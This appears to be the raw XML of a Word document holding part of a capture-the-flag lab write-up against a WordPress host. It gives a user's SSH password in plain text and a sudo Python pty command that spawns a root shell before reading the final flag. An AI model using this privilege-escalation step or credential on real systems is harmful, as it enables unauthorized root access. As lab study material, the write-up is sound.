        <w:br/>
      </w:r>
      <w:r w:rsidR="004E2867">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>steven@localhost’s password: pink84</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6801637D" w14:textId="369BAAFE" w:rsidR="004E2867" w:rsidRDefault="004E2867" w:rsidP="00182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11DC676" w14:textId="77777777" w:rsidR="0016626B" w:rsidRDefault="001662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452F4E" w14:textId="52A37305" w:rsidR="00343386" w:rsidRPr="002279D3" w:rsidRDefault="0016626B" w:rsidP="0016626B">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016626B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669D3680" wp14:editId="0B1094A4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>885825</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1017270</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4953691" cy="3534268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26B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sudo python -c 'import pty;pty.spawn("/bin/bash");'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>cd ../../</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>cd root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>ls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>cat flag4.txt</w:t>
      </w:r>
      <w:r w:rsidR="00182D73" w:rsidRPr="002279D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00182D73" w:rsidRPr="002279D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00343386" w:rsidRPr="00227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E4887"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D4BAA3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0F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3060" w:hanging="36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9846AE4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FE64E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2743849">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="218516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386"/>
    <w:rsid w:val="000F515E"/>
    <w:rsid w:val="0016626B"/>
    <w:rsid w:val="00176F7F"/>
    <w:rsid w:val="00182D73"/>
    <w:rsid w:val="00205112"/>
    <w:rsid w:val="002279D3"/>
    <w:rsid w:val="00343386"/>
    <w:rsid w:val="003675C1"/>
    <w:rsid w:val="00424194"/>
    <w:rsid w:val="004E2867"/>
    <w:rsid w:val="005D1AC5"/>
    <w:rsid w:val="00615B3E"/>
    <w:rsid w:val="009C4FD3"/>
    <w:rsid w:val="00AA667D"/>
    <w:rsid w:val="00CE2263"/>
    <w:rsid w:val="00E86DDB"/>
    <w:rsid w:val="00EC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B0B02"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{540C1E36-F65B-45CA-925A-0C020046D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B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66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6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9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1.110/wordpress" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:michael@192.168.1.110" TargetMode="External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hyperlink" Target="mailto:michael@192.168.1.110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U Desai</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Harsh U Desai</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-08-23T00:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-25T01:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>